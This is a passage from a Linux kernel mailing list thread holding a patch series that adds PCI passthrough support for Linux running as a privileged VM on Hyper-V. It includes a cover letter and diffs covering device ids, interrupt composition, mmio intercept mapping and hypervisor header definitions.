*irqd) @@ -486,7 +515,7 @@ int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry) hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return 
hv_unmap_interrupt(hv_devid.as_uint64, entry); + return hv_unmap_interrupt(hv_devid, entry); } EXPORT_SYMBOL_GPL(hv_unmap_ioapic_interrupt); diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index e4ccdbbf1d12..b6facd3a0f5e 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -204,11 +204,15 @@ static inline u64 hv_iommu_get_curr_partid(void) #endif /* CONFIG_HYPERV_IOMMU */ u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); +void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg); +extern bool hv_no_attdev; struct irq_domain *hv_create_pci_msi_domain(void); int hv_map_msi_interrupt(struct irq_data *data, struct hv_interrupt_entry *out_entry); +int hv_unmap_msi_interrupt(struct pci_dev *dev, + struct hv_interrupt_entry *hvirqe); int hv_map_ioapic_interrupt(int ioapic_id, bool level, int vcpu, int vector, struct hv_interrupt_entry *entry); int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry); diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 40f0b06bb966..71d1599dc4a8 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -660,15 +660,17 @@ static void hv_irq_retarget_interrupt(struct irq_data *data) params = *this_cpu_ptr(hyperv_pcpu_input_arg); memset(params, 0, sizeof(*params)); - params->partition_id = HV_PARTITION_ID_SELF; + + if (hv_pcidev_is_attached_dev(pdev)) + params->partition_id = hv_iommu_get_curr_partid(); + else + params->partition_id = HV_PARTITION_ID_SELF; + params->int_entry.source = HV_INTERRUPT_SOURCE_MSI; - params->int_entry.msi_entry.address.as_uint32 = int_desc->address & 0xffffffff; + params->int_entry.msi_entry.address.as_uint32 = + int_desc->address & 0xffffffff; params->int_entry.msi_entry.data.as_uint32 = int_desc->data; - params->device_id = (hbus->hdev->dev_instance.b[5] << 24) | - (hbus->hdev->dev_instance.b[4] << 16) | - (hbus->hdev->dev_instance.b[7] 
<< 8) | - (hbus->hdev->dev_instance.b[6] & 0xf8) | - PCI_FUNC(pdev->devfn); + params->device_id = hv_pci_vmbus_device_id(pdev); params->int_target.vector = hv_msi_get_int_vector(data); if (hbus->protocol_version >= PCI_PROTOCOL_VERSION_1_2) { @@ -1263,6 +1265,15 @@ static void _hv_pcifront_read_config(struct hv_pci_dev *hpdev, int where, mb(); } spin_unlock_irqrestore(&hbus->config_lock, flags); + /* + * Make sure PCI_INTERRUPT_PIN is hard-wired to 0 since it may + * be read using a 32-bit read which is skipped by the above + * emulation. + */ + if (PCI_INTERRUPT_PIN >= where && + PCI_INTERRUPT_PIN < (where + size)) { + *((char *)val + PCI_INTERRUPT_PIN - where) = 0; + } } else { dev_err(dev, "Attempt to read beyond a function's config space.\n"); } @@ -1731,14 +1742,22 @@ static void hv_msi_free(struct irq_domain *domain, unsigned int irq) if (!int_desc) return; - irq_data->chip_data = NULL; hpdev = get_pcichild_wslot(hbus, devfn_to_wslot(pdev->devfn)); if (!hpdev) { + irq_data->chip_data = NULL; kfree(int_desc); return; } - hv_int_desc_free(hpdev, int_desc); + if (hv_pcidev_is_attached_dev(pdev)) { + hv_unmap_msi_interrupt(pdev, irq_data->chip_data); + kfree(irq_data->chip_data); + irq_data->chip_data = NULL; + } else { + irq_data->chip_data = NULL; + hv_int_desc_free(hpdev, int_desc); + } + put_pcichild(hpdev); } @@ -2139,6 +2158,56 @@ static void hv_vmbus_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) msg->data = 0; } +/* Compose an msi message for a directly attached device */ +static void hv_dda_compose_msi_msg(struct irq_data *irq_data, + struct msi_desc *msi_desc, + struct msi_msg *msg) +{ + bool multi_msi; + struct hv_pcibus_device *hbus; + struct hv_pci_dev *hpdev; + struct pci_dev *pdev = msi_desc_to_pci_dev(msi_desc); + + multi_msi = !msi_desc->pci.msi_attrib.is_msix && + msi_desc->nvec_used > 1; + + if (multi_msi) { + dev_err(&pdev->dev, + "Passthru direct attach does not support multi msi\n"); + goto outerr; + } + + hbus = 
container_of(pdev->bus->sysdata, struct hv_pcibus_device, + sysdata); + + hpdev = get_pcichild_wslot(hbus, devfn_to_wslot(pdev->devfn)); + if (!hpdev) + goto outerr; + + /* will unmap if needed and also update irq_data->chip_data */ + hv_irq_compose_msi_msg(irq_data, msg); + + put_pcichild(hpdev); + return; + +outerr: + memset(msg, 0, sizeof(*msg)); +} + +static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +{ + struct pci_dev *pdev; + struct msi_desc *msi_desc; + + msi_desc = irq_data_get_msi_desc(data); + pdev = msi_desc_to_pci_dev(msi_desc); + + if (hv_pcidev_is_attached_dev(pdev)) + hv_dda_compose_msi_msg(data, msi_desc, msg); + else + hv_vmbus_compose_msi_msg(data, msg); +} + static bool hv_pcie_init_dev_msi_info(struct device *dev, struct irq_domain *domain, struct irq_domain *real_parent, struct msi_domain_info *info) { @@ -2177,7 +2246,7 @@ static const struct msi_parent_ops hv_pcie_msi_parent_ops = { /* HW Interrupt Chip Descriptor */ static struct irq_chip hv_msi_irq_chip = { .name = "Hyper-V PCIe MSI", - .irq_compose_msi_msg = hv_vmbus_compose_msi_msg, + .irq_compose_msi_msg = hv_compose_msi_msg, .irq_set_affinity = irq_chip_set_affinity_parent, .irq_ack = irq_chip_ack_parent, .irq_eoi = irq_chip_eoi_parent, @@ -4096,7 +4165,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) irq_data = irq_get_irq_data(entry->irq); if (WARN_ON_ONCE(!irq_data)) return -EINVAL; - hv_vmbus_compose_msi_msg(irq_data, &entry->msg); + hv_compose_msi_msg(irq_data, &entry->msg); } return 0; } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:28 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on the Microsoft Hyper-V hypervisor. This support is made to fit within the workings of the VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in the VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor version 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support in the near future. 
Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Upon guest access, in case of missing mmio mapping, the hypervisor generates an unmapped gpa intercept. In this path, lookup the PCI resource pfn for the guest gpa, and ask the hypervisor to map it via hypercall. The PCI resource pfn is maintained by the VFIO driver, and obtained via fixup_user_fault call (similar to KVM). Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 115 ++++++++++++++++++++++++++++++++++++ 1 file changed, 115 insertions(+) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 03f3aa9f5541..4c8bc7cd0888 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -56,6 +56,14 @@ struct hv_stats_page { }; } __packed; +bool hv_nofull_mmio; /* don't map entire mmio region upon fault */ +static int __init setup_hv_full_mmio(char *str) +{ + hv_nofull_mmio = true; + return 0; +} +__setup("hv_nofull_mmio", setup_hv_full_mmio); + struct mshv_root mshv_root; enum hv_scheduler_type hv_scheduler_type; @@ -612,6 +620,109 @@ mshv_partition_region_by_gfn(struct mshv_partition *partition, u64 gfn) } #ifdef CONFIG_X86_64 + +/* + * Check if uaddr is for mmio range. If yes, return 0 with mmio_pfn filled in + * else just return -errno. + */ +static int mshv_chk_get_mmio_start_pfn(struct mshv_partition *pt, u64 gfn, + u64 *mmio_pfnp) +{ + struct vm_area_struct *vma; + bool is_mmio; + u64 uaddr; + struct mshv_mem_region *mreg; + struct follow_pfnmap_args pfnmap_args; + int rc = -EINVAL; + + /* + * Do not allow mem region to be deleted beneath us. VFIO uses + * useraddr vma to lookup pci bar pfn. 
+ */ + spin_lock(&pt->pt_mem_regions_lock); + + /* Get the region again under the lock */ + mreg = mshv_partition_region_by_gfn(pt, gfn); + if (mreg == NULL || mreg->type != MSHV_REGION_TYPE_MMIO) + goto unlock_pt_out; + + uaddr = mreg->start_uaddr + + ((gfn - mreg->start_gfn) << HV_HYP_PAGE_SHIFT); + + mmap_read_lock(current->mm); + vma = vma_lookup(current->mm, uaddr); + is_mmio = vma ? !!(vma->vm_flags & (VM_IO | VM_PFNMAP)) : 0; + if (!is_mmio) + goto unlock_mmap_out; + + pfnmap_args.vma = vma; + pfnmap_args.address = uaddr; + + rc = follow_pfnmap_start(&pfnmap_args); + if (rc) { + rc = fixup_user_fault(current->mm, uaddr, FAULT_FLAG_WRITE, + NULL); + if (rc) + goto unlock_mmap_out; + + rc = follow_pfnmap_start(&pfnmap_args); + if (rc) + goto unlock_mmap_out; + } + + *mmio_pfnp = pfnmap_args.pfn; + follow_pfnmap_end(&pfnmap_args); + +unlock_mmap_out: + mmap_read_unlock(current->mm); +unlock_pt_out: + spin_unlock(&pt->pt_mem_regions_lock); + return rc; +} + +/* + * At present, the only unmapped gpa is mmio space. Verify if it's mmio + * and resolve if possible. 
+ * Returns: True if valid mmio intercept and it was handled, else false + */ +static bool mshv_handle_unmapped_gpa(struct mshv_vp *vp) +{ + struct hv_message *hvmsg = vp->vp_intercept_msg_page; + struct hv_x64_memory_intercept_message *msg; + union hv_x64_memory_access_info accinfo; + u64 gfn, mmio_spa, numpgs; + struct mshv_mem_region *mreg; + int rc; + struct mshv_partition *pt = vp->vp_partition; + + msg = (struct hv_x64_memory_intercept_message *)hvmsg->u.payload; + accinfo = msg->memory_access_info; + + if (!accinfo.gva_gpa_valid) + return false; + + /* Do a fast check and bail if non mmio intercept */ + gfn = msg->guest_physical_address >> HV_HYP_PAGE_SHIFT; + mreg = mshv_partition_region_by_gfn(pt, gfn); + if (mreg == NULL || mreg->type != MSHV_REGION_TYPE_MMIO) + return false; + + rc = mshv_chk_get_mmio_start_pfn(pt, gfn, &mmio_spa); + if (rc) + return false; + + if (!hv_nofull_mmio) { /* default case */ + mmio_spa = mmio_spa - (gfn - mreg->start_gfn); + gfn = mreg->start_gfn; + numpgs = mreg->nr_pages; + } else + numpgs = 1; + + rc = hv_call_map_mmio_pages(pt->pt_id, gfn, mmio_spa, numpgs); + + return rc == 0; +} + static struct mshv_mem_region * mshv_partition_region_by_gfn_get(struct mshv_partition *p, u64 gfn) { @@ -666,13 +777,17 @@ static bool mshv_handle_gpa_intercept(struct mshv_vp *vp) return ret; } + #else /* CONFIG_X86_64 */ +static bool mshv_handle_unmapped_gpa(struct mshv_vp *vp) { return false; } static bool mshv_handle_gpa_intercept(struct mshv_vp *vp) { return false; } #endif /* CONFIG_X86_64 */ static bool mshv_vp_handle_intercept(struct mshv_vp *vp) { switch (vp->vp_intercept_msg_page->header.message_type) { + case HVMSG_UNMAPPED_GPA: + return mshv_handle_unmapped_gpa(vp); case HVMSG_GPA_INTERCEPT: return mshv_handle_gpa_intercept(vp); } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:30 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> VFIO no longer puts the mmio pfn in vma->vm_pgoff. So, remove code that is using it to map mmio space. It is broken and will cause panic. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 20 ++++---------------- 1 file changed, 4 insertions(+), 16 deletions(-) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 27313419828d..03f3aa9f5541 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1258,16 +1258,8 @@ static int mshv_prepare_pinned_region(struct mshv_mem_region *region) } /* - * This maps two things: guest RAM and for pci passthru mmio space. - * - * mmio: - * - vfio overloads vm_pgoff to store the mmio start pfn/spa. - * - Two things need to happen for mapping mmio range: - * 1. mapped in the uaddr so VMM can access it. - * 2. mapped in the hwpt (gfn <-> mmio phys addr) so guest can access it. - * - * This function takes care of the second. The first one is managed by vfio, - * and hence is taken care of via vfio_pci_mmap_fault(). + * This is called for both user ram and mmio space. The mmio space is not + * mapped here, but later during intercept. */ static long mshv_map_user_memory(struct mshv_partition *partition, @@ -1276,7 +1268,6 @@ mshv_map_user_memory(struct mshv_partition *partition, struct mshv_mem_region *region; struct vm_area_struct *vma; bool is_mmio; - ulong mmio_pfn; long ret; if (mem.flags & BIT(MSHV_SET_MEM_BIT_UNMAP) || @@ -1286,7 +1277,6 @@ mshv_map_user_memory(struct mshv_partition *partition, mmap_read_lock(current->mm); vma = vma_lookup(current->mm, mem.userspace_addr); is_mmio = vma ? !!(vma->vm_flags & (VM_IO | VM_PFNMAP)) : 0; - mmio_pfn = is_mmio ? 
vma->vm_pgoff : 0; mmap_read_unlock(current->mm); if (!vma) @@ -1313,10 +1303,8 @@ mshv_map_user_memory(struct mshv_partition *partition, HV_MAP_GPA_NO_ACCESS, NULL); break; case MSHV_REGION_TYPE_MMIO: - ret = hv_call_map_mmio_pages(partition->pt_id, - region->start_gfn, - mmio_pfn, - region->nr_pages); + /* mmio mappings are handled later during intercepts */ + ret = 0; break; } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:29 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> Import/copy from Hyper-V public headers, definitions and declarations that are related to attaching and detaching of device domains and interrupt remapping, and building device ids for those purposes. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- include/hyperv/hvgdk_mini.h | 11 ++++ include/hyperv/hvhdk_mini.h | 112 ++++++++++++++++++++++++++++++++++++ 2 files changed, 123 insertions(+) diff --git a/include/hyperv/hvgdk_mini.h b/include/hyperv/hvgdk_mini.h index 04b18d0e37af..bda9fae5b1ef 100644 --- a/include/hyperv/hvgdk_mini.h +++ b/include/hyperv/hvgdk_mini.h @@ -323,6 +323,9 @@ union hv_hypervisor_version_info { /* stimer Direct Mode is available */ #define HV_STIMER_DIRECT_MODE_AVAILABLE BIT(19) +#define HV_DEVICE_DOMAIN_AVAILABLE BIT(24) +#define HV_S1_DEVICE_DOMAIN_AVAILABLE BIT(25) + /* * Implementation recommendations. Indicates which behaviors the hypervisor * recommends the OS implement for optimal performance. 
@@ -471,6 +474,8 @@ union hv_vp_assist_msr_contents { /* HV_REGISTER_VP_ASSIST_PAGE */ #define HVCALL_MAP_DEVICE_INTERRUPT 0x007c #define HVCALL_UNMAP_DEVICE_INTERRUPT 0x007d #define HVCALL_RETARGET_INTERRUPT 0x007e +#define HVCALL_ATTACH_DEVICE 0x0082 +#define HVCALL_DETACH_DEVICE 0x0083 #define HVCALL_NOTIFY_PARTITION_EVENT 0x0087 #define HVCALL_ENTER_SLEEP_STATE 0x0084 #define HVCALL_NOTIFY_PORT_RING_EMPTY 0x008b @@ -482,9 +487,15 @@ union hv_vp_assist_msr_contents { /* HV_REGISTER_VP_ASSIST_PAGE */ #define HVCALL_GET_VP_INDEX_FROM_APIC_ID 0x009a #define HVCALL_FLUSH_GUEST_PHYSICAL_ADDRESS_SPACE 0x00af #define HVCALL_FLUSH_GUEST_PHYSICAL_ADDRESS_LIST 0x00b0 +#define HVCALL_CREATE_DEVICE_DOMAIN 0x00b1 +#define HVCALL_ATTACH_DEVICE_DOMAIN 0x00b2 +#define HVCALL_MAP_DEVICE_GPA_PAGES 0x00b3 +#define HVCALL_UNMAP_DEVICE_GPA_PAGES 0x00b4 #define HVCALL_SIGNAL_EVENT_DIRECT 0x00c0 #define HVCALL_POST_MESSAGE_DIRECT 0x00c1 #define HVCALL_DISPATCH_VP 0x00c2 +#define HVCALL_DETACH_DEVICE_DOMAIN 0x00c4 +#define HVCALL_DELETE_DEVICE_DOMAIN 0x00c5 #define HVCALL_GET_GPA_PAGES_ACCESS_STATES 0x00c9 #define HVCALL_ACQUIRE_SPARSE_SPA_PAGE_HOST_ACCESS 0x00d7 #define HVCALL_RELEASE_SPARSE_SPA_PAGE_HOST_ACCESS 0x00d8 diff --git a/include/hyperv/hvhdk_mini.h b/include/hyperv/hvhdk_mini.h index 41a29bf8ec14..57821d6ddb61 100644 --- a/include/hyperv/hvhdk_mini.h +++ b/include/hyperv/hvhdk_mini.h @@ -449,6 +449,32 @@ struct hv_send_ipi_ex { /* HV_INPUT_SEND_SYNTHETIC_CLUSTER_IPI_EX */ struct hv_vpset vp_set; } __packed; +union hv_attdev_flags { /* HV_ATTACH_DEVICE_FLAGS */ + struct { + u32 logical_id : 1; + u32 resvd0 : 1; + u32 ats_enabled : 1; + u32 virt_func : 1; + u32 shared_irq_child : 1; + u32 virt_dev : 1; + u32 ats_supported : 1; + u32 small_irt : 1; + u32 resvd : 24; + } __packed; + u32 as_uint32; +}; + +union hv_dev_pci_caps { /* HV_DEVICE_PCI_CAPABILITIES */ + struct { + u32 max_pasid_width : 5; + u32 invalidate_qdepth : 5; + u32 global_inval : 1; + u32 prg_response_req : 1; 
+ u32 resvd : 20; + } __packed; + u32 as_uint32; +}; + typedef u16 hv_pci_rid; /* HV_PCI_RID */ typedef u16 hv_pci_segment; /* HV_PCI_SEGMENT */ typedef u64 hv_logical_device_id; @@ -528,4 +554,90 @@ union hv_device_id { /* HV_DEVICE_ID */ } acpi; } __packed; +struct hv_input_attach_device { /* HV_INPUT_ATTACH_DEVICE */ + u64 partition_id; + union hv_device_id device_id; + union hv_attdev_flags attdev_flags; + u8 attdev_vtl; + u8 rsvd0; + u16 rsvd1; + u64 logical_devid; + union hv_dev_pci_caps dev_pcicaps; + u16 pf_pci_rid; + u16 resvd2; +} __packed; + +struct hv_input_detach_device { /* HV_INPUT_DETACH_DEVICE */ + u64 partition_id; + u64 logical_devid; +} __packed; + + +/* 3 domain types: stage 1, stage 2, and SOC */ +#define HV_DEVICE_DOMAIN_TYPE_S2 0 /* HV_DEVICE_DOMAIN_ID_TYPE_S2 */ +#define HV_DEVICE_DOMAIN_TYPE_S1 1 /* HV_DEVICE_DOMAIN_ID_TYPE_S1 */ +#define HV_DEVICE_DOMAIN_TYPE_SOC 2 /* HV_DEVICE_DOMAIN_ID_TYPE_SOC */ + +/* ID for stage 2 default domain and NULL domain */ +#define HV_DEVICE_DOMAIN_ID_S2_DEFAULT 0 +#define HV_DEVICE_DOMAIN_ID_S2_NULL 0xFFFFFFFFULL + +union hv_device_domain_id { + u64 as_uint64; + struct { + u32 type : 4; + u32 reserved : 28; + u32 id; + }; +} __packed; + +struct hv_input_device_domain { /* HV_INPUT_DEVICE_DOMAIN */ + u64 partition_id; + union hv_input_vtl owner_vtl; + u8 padding[7]; + union hv_device_domain_id domain_id; +} __packed; + +union hv_create_device_domain_flags { /* HV_CREATE_DEVICE_DOMAIN_FLAGS */ + u32 as_uint32; + struct { + u32 forward_progress_required : 1; + u32 inherit_owning_vtl : 1; + u32 reserved : 30; + } __packed; +} __packed; + +struct hv_input_create_device_domain { /* HV_INPUT_CREATE_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; + union hv_create_device_domain_flags create_device_domain_flags; +} __packed; + +struct hv_input_delete_device_domain { /* HV_INPUT_DELETE_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; +} __packed; + +struct hv_input_attach_device_domain 
{ /* HV_INPUT_ATTACH_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; + union hv_device_id device_id; +} __packed; + +struct hv_input_detach_device_domain { /* HV_INPUT_DETACH_DEVICE_DOMAIN */ + u64 partition_id; + union hv_device_id device_id; +} __packed; + +struct hv_input_map_device_gpa_pages { /* HV_INPUT_MAP_DEVICE_GPA_PAGES */ + struct hv_input_device_domain device_domain; + union hv_input_vtl target_vtl; + u8 padding[3]; + u32 map_flags; + u64 target_device_va_base; + u64 gpa_page_list[]; +} __packed; + +struct hv_input_unmap_device_gpa_pages { /* HV_INPUT_UNMAP_DEVICE_GPA_PAGES */ + struct hv_input_device_domain device_domain; + u64 target_device_va_base; +} __packed; + #endif /* _HV_HVHDK_MINI_H */ -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:24 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> On Hyper-V, most hypercalls related to PCI passthru to map/unmap regions, interrupts, etc need a device id as a parameter. This device id refers to that specific device during the lifetime of passthru. An L1VH VM only contains VMBus based devices. A device id for a VMBus device is slightly different in that it uses the hv_pcibus_device info for building it to make sure it matches exactly what the hypervisor expects. This VMBus based device id is needed when attaching devices in an L1VH based guest VM. Before building it, a check is done to make sure the device is a valid VMBus device. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/include/asm/mshyperv.h | 2 ++ drivers/pci/controller/pci-hyperv.c | 29 +++++++++++++++++++++++++++++ 2 files changed, 31 insertions(+) diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index eef4c3a5ba28..0d7fdfb25e76 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -188,6 +188,8 @@ bool hv_vcpu_is_preempted(int vcpu); static inline void hv_apic_init(void) {} #endif +u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); + struct irq_domain *hv_create_pci_msi_domain(void); int hv_map_msi_interrupt(struct irq_data *data, diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 8bc6a38c9b5a..40f0b06bb966 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -579,6 +579,8 @@ static void hv_pci_onchannelcallback(void *context); #define DELIVERY_MODE APIC_DELIVERY_MODE_FIXED #define HV_MSI_CHIP_FLAGS MSI_CHIP_FLAG_SET_ACK +static bool hv_vmbus_pci_device(struct pci_bus *pbus); + static int hv_pci_irqchip_init(void) { return 0; @@ -598,6 +600,26 @@ static unsigned int hv_msi_get_int_vector(struct irq_data *data) #define hv_msi_prepare pci_msi_prepare +u64 hv_pci_vmbus_device_id(struct pci_dev *pdev) +{ + u64 u64val; + struct 
hv_pcibus_device *hbus; + struct pci_bus *pbus = pdev->bus; + + if (!hv_vmbus_pci_device(pbus)) + return 0; + + hbus = container_of(pbus->sysdata, struct hv_pcibus_device, sysdata); + u64val = (hbus->hdev->dev_instance.b[5] << 24) | + (hbus->hdev->dev_instance.b[4] << 16) | + (hbus->hdev->dev_instance.b[7] << 8) | + (hbus->hdev->dev_instance.b[6] & 0xf8) | + PCI_FUNC(pdev->devfn); + + return u64val; +} +EXPORT_SYMBOL_GPL(hv_pci_vmbus_device_id); + /** * hv_irq_retarget_interrupt() - "Unmask" the IRQ by setting its current * affinity. @@ -1404,6 +1426,13 @@ static struct pci_ops hv_pcifront_ops = { .write = hv_pcifront_write_config, }; +#ifdef CONFIG_X86 +static bool hv_vmbus_pci_device(struct pci_bus *pbus) +{ + return pbus->ops == &hv_pcifront_ops; +} +#endif /* CONFIG_X86 */ + /* * Paravirtual backchannel * -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:25 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> On Hyper-V, most hypercalls related to PCI passthru, such as those to map/unmap regions, interrupts, etc, need a device id as a parameter. A device id refers to a specific device and comes in two types: o Logical: used for direct attach (see below) hypercalls. A logical device id is a unique 62-bit value that is created and sent during the initial device attach. All further communications (for interrupt remaps etc) must then use this logical id. o PCI: used for device domain hypercalls such as map, unmap, etc. This is built using the actual device BDF info. PS: Since an L1VH only supports direct attaches, a logical device id on an L1VH VM is always a VMBus device id. For non-L1VH cases, we just use the PCI BDF info, although not strictly needed, to build the logical device id. At a high level, Hyper-V supports two ways to do PCI passthru: 1. Device Domain: root must create a device domain in the hypervisor, and do map/unmap hypercalls for mapping and unmapping guest RAM. All hypervisor communications use a device id of type PCI for identifying and referencing the device. 2. Direct Attach: the hypervisor simply uses the guest's HW page table for mappings, so the host need not do map/unmap hypercalls. A direct attached device must be referenced via its logical device id and never via the PCI device id. For an L1VH root/parent, Hyper-V only supports direct attaches. 
Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 60 ++++++++++++++++++++++++++++++--- arch/x86/include/asm/mshyperv.h | 14 ++++++++ 2 files changed, 70 insertions(+), 4 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index ccbe5848a28f..33017aa0caa4 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -137,7 +137,7 @@ static int get_rid_cb(struct pci_dev *pdev, u16 alias, void *data) return 0; } -static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) +static u64 hv_build_devid_type_pci(struct pci_dev *pdev) { int pos; union hv_device_id hv_devid; @@ -197,7 +197,58 @@ static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) } out: - return hv_devid; + return hv_devid.as_uint64; +} + +/* Build device id for direct attached devices */ +static u64 hv_build_devid_type_logical(struct pci_dev *pdev) +{ + hv_pci_segment segment; + union hv_device_id hv_devid; + union hv_pci_bdf bdf = {.as_uint16 = 0}; + struct rid_data data = { + .bridge = NULL, + .rid = PCI_DEVID(pdev->bus->number, pdev->devfn) + }; + + segment = pci_domain_nr(pdev->bus); + bdf.bus = PCI_BUS_NUM(data.rid); + bdf.device = PCI_SLOT(data.rid); + bdf.function = PCI_FUNC(data.rid); + + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_LOGICAL; + hv_devid.logical.id = (u64)segment << 16 | bdf.as_uint16; + + return hv_devid.as_uint64; +} + +/* Build device id after the device has been attached */ +u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type) +{ + if (type == HV_DEVICE_TYPE_LOGICAL) { + if (hv_l1vh_partition()) + return hv_pci_vmbus_device_id(pdev); + else + return hv_build_devid_type_logical(pdev); + } else if (type == HV_DEVICE_TYPE_PCI) + return hv_build_devid_type_pci(pdev); + + return 0; +} +EXPORT_SYMBOL_GPL(hv_build_devid_oftype); + +/* Build device id for the interrupt path */ +static u64 hv_build_irq_devid(struct pci_dev *pdev) 
